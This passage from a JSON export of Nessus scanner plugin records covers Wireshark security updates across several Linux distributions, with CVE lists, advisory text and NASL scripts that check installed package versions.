Patch Number 7439)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-1455", "CVE-2010-2283", "CVE-2010-2284", "CVE-2010-2285", "CVE-2010-2286", "CVE-2010-2287", "CVE-2010-2992", "CVE-2010-2993", "CVE-2010-2994", "CVE-2010-2995", "CVE-2010-3445", "CVE-2010-4300", "CVE-2010-4301", "CVE-2010-4538", "CVE-2011-0444", "CVE-2011-0445", "CVE-2011-0538", "CVE-2011-0713", "CVE-2011-1138", "CVE-2011-1139", "CVE-2011-1140", "CVE-2011-1143"], "modified": "2021-01-19T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_WIRESHARK-7439.NASL", "href": "https://www.tenable.com/plugins/nessus/53319", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(53319);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2010-1455\", \"CVE-2010-2283\", \"CVE-2010-2284\", \"CVE-2010-2285\", \"CVE-2010-2286\", \"CVE-2010-2287\", \"CVE-2010-2992\", \"CVE-2010-2993\", \"CVE-2010-2994\", \"CVE-2010-2995\", \"CVE-2010-3445\", \"CVE-2010-4300\", \"CVE-2010-4301\", \"CVE-2010-4538\", \"CVE-2011-0444\", \"CVE-2011-0445\", \"CVE-2011-0538\", \"CVE-2011-0713\", \"CVE-2011-1138\", \"CVE-2011-1139\", \"CVE-2011-1140\", \"CVE-2011-1143\");\n\n script_name(english:\"SuSE 10 Security Update : wireshark (ZYPP Patch Number 7439)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\"Wireshark was updated to version 1.4.4 to fix several security issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1455.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2283.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2284.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2285.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2286.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2287.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2992.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2993.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2994.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2995.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3445.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-4300.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-4301.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-4538.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-0444.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-0445.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-0538.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-0713.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-1138.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-1139.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-1140.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-1143.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 7439.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/05/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/03/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/04/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"wireshark-1.4.4-0.37.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"wireshark-1.4.4-0.37.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"wireshark-devel-1.4.4-0.37.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-10T16:12:03", "description": "The remote host is affected by the vulnerability described in GLSA-201110-02 (Wireshark: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Wireshark. Please review the CVE identifiers referenced below for details.\n Impact :\n\n A remote attacker could send specially crafted packets on a network being monitored by Wireshark, entice a user to open a malformed packet trace file using Wireshark, or deploy a specially crafted Lua script for use by Wireshark, possibly resulting in the execution of arbitrary code, or a Denial of Service condition.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"score": null, "vector": null}, "published": "2011-10-10T00:00:00", "type": "nessus", "title": "GLSA-201110-02 : Wireshark: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2283", "CVE-2010-2284", "CVE-2010-2285", "CVE-2010-2286", "CVE-2010-2287", "CVE-2010-2992", "CVE-2010-2993", "CVE-2010-2994", "CVE-2010-2995", "CVE-2010-3133", "CVE-2010-3445", "CVE-2010-4300", "CVE-2010-4301", "CVE-2010-4538", "CVE-2011-0024", "CVE-2011-0444", "CVE-2011-0445", "CVE-2011-0538", "CVE-2011-0713", "CVE-2011-1138", "CVE-2011-1139", "CVE-2011-1140", "CVE-2011-1141", "CVE-2011-1142", "CVE-2011-1143", "CVE-2011-1590", "CVE-2011-1591", "CVE-2011-1592", "CVE-2011-1956", "CVE-2011-1957", "CVE-2011-1958", "CVE-2011-1959", "CVE-2011-2174", "CVE-2011-2175", "CVE-2011-2597", "CVE-2011-2698", "CVE-2011-3266", "CVE-2011-3360", "CVE-2011-3482", "CVE-2011-3483"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:wireshark", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201110-02.NASL", "href": "https://www.tenable.com/plugins/nessus/56426", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201110-02.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56426);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2010-2283\", \"CVE-2010-2284\", \"CVE-2010-2285\", \"CVE-2010-2286\", \"CVE-2010-2287\", \"CVE-2010-2992\", \"CVE-2010-2993\", \"CVE-2010-2994\", \"CVE-2010-2995\", \"CVE-2010-3133\", \"CVE-2010-3445\", \"CVE-2010-4300\", \"CVE-2010-4301\", \"CVE-2010-4538\", \"CVE-2011-0024\", \"CVE-2011-0444\", \"CVE-2011-0445\", \"CVE-2011-0538\", \"CVE-2011-0713\", \"CVE-2011-1138\", \"CVE-2011-1139\", \"CVE-2011-1140\", \"CVE-2011-1141\", \"CVE-2011-1142\", \"CVE-2011-1143\", \"CVE-2011-1590\", \"CVE-2011-1591\", \"CVE-2011-1592\", \"CVE-2011-1956\", \"CVE-2011-1957\", \"CVE-2011-1958\", \"CVE-2011-1959\", \"CVE-2011-2174\", \"CVE-2011-2175\", \"CVE-2011-2597\", \"CVE-2011-2698\", \"CVE-2011-3266\", \"CVE-2011-3360\", \"CVE-2011-3482\", \"CVE-2011-3483\");\n script_xref(name:\"GLSA\", value:\"201110-02\");\n\n script_name(english:\"GLSA-201110-02 : Wireshark: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201110-02\n(Wireshark: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Wireshark. Please\n review the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could send specially crafted packets on a network\n being monitored by Wireshark, entice a user to open a malformed packet\n trace file using Wireshark, or deploy a specially crafted Lua script for\n use by Wireshark, possibly resulting in the execution of arbitrary code,\n or a Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201110-02\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Wireshark users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-analyzer/wireshark-1.4.9'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Wireshark console.lua Pre-Loading Script Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:wireshark\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/10/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-analyzer/wireshark\", unaffected:make_list(\"ge 1.4.9\"), vulnerable:make_list(\"lt 1.4.9\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Wireshark\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:00:18", "description": "Huzaifa Sidhpurwala, David Maciejak and others discovered several vulnerabilities in the X.509if and DICOM dissectors and in the code to process various capture and dictionary files, which could lead to denial of service or the execution of arbitrary code.", "cvss3": {"score": null, "vector": null}, "published": "2011-07-08T00:00:00", "type": "nessus", "title": "Debian DSA-2274-1 : wireshark - several vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-1590", "CVE-2011-1957", "CVE-2011-1958", "CVE-2011-1959", "CVE-2011-2174", "CVE-2011-2175"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:wireshark", "cpe:/o:debian:debian_linux:5.0", "cpe:/o:debian:debian_linux:6.0"], "id": "DEBIAN_DSA-2274.NASL", "href": "https://www.tenable.com/plugins/nessus/55537", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2274. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(55537);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2011-1590\", \"CVE-2011-1957\", \"CVE-2011-1958\", \"CVE-2011-1959\", \"CVE-2011-2174\", \"CVE-2011-2175\");\n script_bugtraq_id(47392, 48066);\n script_xref(name:\"DSA\", value:\"2274\");\n\n script_name(english:\"Debian DSA-2274-1 : wireshark - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Huzaifa Sidhpurwala, David Maciejak and others discovered several\nvulnerabilities in the X.509if and DICOM dissectors and in the code to\nprocess various capture and dictionary files, which could lead to\ndenial of service or the execution of arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/wireshark\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2011/dsa-2274\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the wireshark packages.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.0.2-3+lenny14.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.2.11-6+squeeze2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:wireshark\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/07/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/07/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"5.0\", prefix:\"wireshark\", reference:\"1.0.2-3+lenny14\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"tshark\", reference:\"1.2.11-6+squeeze2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"wireshark\", reference:\"1.2.11-6+squeeze2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"wireshark-common\", reference:\"1.2.11-6+squeeze2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"wireshark-dbg\", reference:\"1.2.11-6+squeeze2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"wireshark-dev\", reference:\"1.2.11-6+squeeze2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-08-19T12:53:55", "description": "From Red Hat Security Advisory 2012:0509 :\n\nUpdated wireshark packages that fix several security issues are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nWireshark is a program for monitoring network traffic. Wireshark was previously known as Ethereal.\n\nSeveral flaws were found in Wireshark. If Wireshark read a malformed packet off a network or opened a malicious dump file, it could crash or, possibly, execute arbitrary code as the user running Wireshark.\n(CVE-2011-1590, CVE-2011-4102, CVE-2012-1595)\n\nSeveral denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file. (CVE-2011-1143, CVE-2011-1957, CVE-2011-1958, CVE-2011-1959, CVE-2011-2174, CVE-2011-2175, CVE-2011-2597, CVE-2011-2698, CVE-2012-0041, CVE-2012-0042, CVE-2012-0067, CVE-2012-0066)\n\nUsers of Wireshark should upgrade to these updated packages, which contain backported patches to correct these issues. All running instances of Wireshark must be restarted for the update to take effect.", "cvss3": {"score": null, "vector": null}, "published": "2013-07-12T00:00:00", "type": "nessus", "title": "Oracle Linux 6 : wireshark (ELSA-2012-0509)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-1143", "CVE-2011-1590", "CVE-2011-1957", "CVE-2011-1958", "CVE-2011-1959", "CVE-2011-2174", "CVE-2011-2175", "CVE-2011-2597", "CVE-2011-2698", "CVE-2011-4102", "CVE-2012-0041", "CVE-2012-0042", "CVE-2012-0066", "CVE-2012-0067", "CVE-2012-1595"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:wireshark", "p-cpe:/a:oracle:linux:wireshark-devel", "p-cpe:/a:oracle:linux:wireshark-gnome", "cpe:/o:oracle:linux:6"], "id": "ORACLELINUX_ELSA-2012-0509.NASL", "href": "https://www.tenable.com/plugins/nessus/68516", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2012:0509 and \n# Oracle Linux Security Advisory ELSA-2012-0509 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68516);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-1143\", \"CVE-2011-1590\", \"CVE-2011-1957\", \"CVE-2011-1958\", \"CVE-2011-1959\", \"CVE-2011-2174\", \"CVE-2011-2175\", \"CVE-2011-2597\", \"CVE-2011-2698\", \"CVE-2011-4102\", \"CVE-2012-0041\", \"CVE-2012-0042\", \"CVE-2012-0066\", \"CVE-2012-0067\", \"CVE-2012-1595\");\n script_bugtraq_id(46796, 47392, 48066, 48506, 49071, 50486, 51368, 51710, 52737);\n script_xref(name:\"RHSA\", value:\"2012:0509\");\n\n script_name(english:\"Oracle Linux 6 : wireshark (ELSA-2012-0509)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2012:0509 :\n\nUpdated wireshark packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nWireshark is a program for monitoring network traffic. Wireshark was\npreviously known as Ethereal.\n\nSeveral flaws were found in Wireshark. If Wireshark read a malformed\npacket off a network or opened a malicious dump file, it could crash\nor, possibly, execute arbitrary code as the user running Wireshark.\n(CVE-2011-1590, CVE-2011-4102, CVE-2012-1595)\n\nSeveral denial of service flaws were found in Wireshark. Wireshark\ncould crash or stop responding if it read a malformed packet off a\nnetwork, or opened a malicious dump file. (CVE-2011-1143,\nCVE-2011-1957, CVE-2011-1958, CVE-2011-1959, CVE-2011-2174,\nCVE-2011-2175, CVE-2011-2597, CVE-2011-2698, CVE-2012-0041,\nCVE-2012-0042, CVE-2012-0067, CVE-2012-0066)\n\nUsers of Wireshark should upgrade to these updated packages, which\ncontain backported patches to correct these issues. All running\ninstances of Wireshark must be restarted for the update to take\neffect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2012-April/002770.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected wireshark packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:wireshark\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:wireshark-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:wireshark-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/03/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"wireshark-1.2.15-2.0.1.el6_2.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"wireshark-devel-1.2.15-2.0.1.el6_2.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"wireshark-gnome-1.2.15-2.0.1.el6_2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wireshark / wireshark-devel / wireshark-gnome\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-08-19T12:58:28", "description": "Updated wireshark packages that fix several security issues are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nWireshark is a program for monitoring network traffic. Wireshark was previously known as Ethereal.\n\nSeveral flaws were found in Wireshark. If Wireshark read a malformed packet off a network or opened a malicious dump file, it could crash or, possibly, execute arbitrary code as the user running Wireshark.\n(CVE-2011-1590, CVE-2011-4102, CVE-2012-1595)\n\nSeveral denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file. (CVE-2011-1143, CVE-2011-1957, CVE-2011-1958, CVE-2011-1959, CVE-2011-2174, CVE-2011-2175, CVE-2011-2597, CVE-2011-2698, CVE-2012-0041, CVE-2012-0042, CVE-2012-0067, CVE-2012-0066)\n\nUsers of Wireshark should upgrade to these updated packages, which contain backported patches to correct these issues. All running instances of Wireshark must be restarted for the update to take effect.", "cvss3": {"score": null, "vector": null}, "published": "2012-04-25T00:00:00", "type": "nessus", "title": "CentOS 6 : wireshark (CESA-2012:0509)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-1143", "CVE-2011-1590", "CVE-2011-1957", "CVE-2011-1958", "CVE-2011-1959", "CVE-2011-2174", "CVE-2011-2175", "CVE-2011-2597", "CVE-2011-2698", "CVE-2011-4102", "CVE-2012-0041", "CVE-2012-0042", "CVE-2012-0066", "CVE-2012-0067", "CVE-2012-1595"], "modified": "2021-01-04T00:00:00", "cpe": 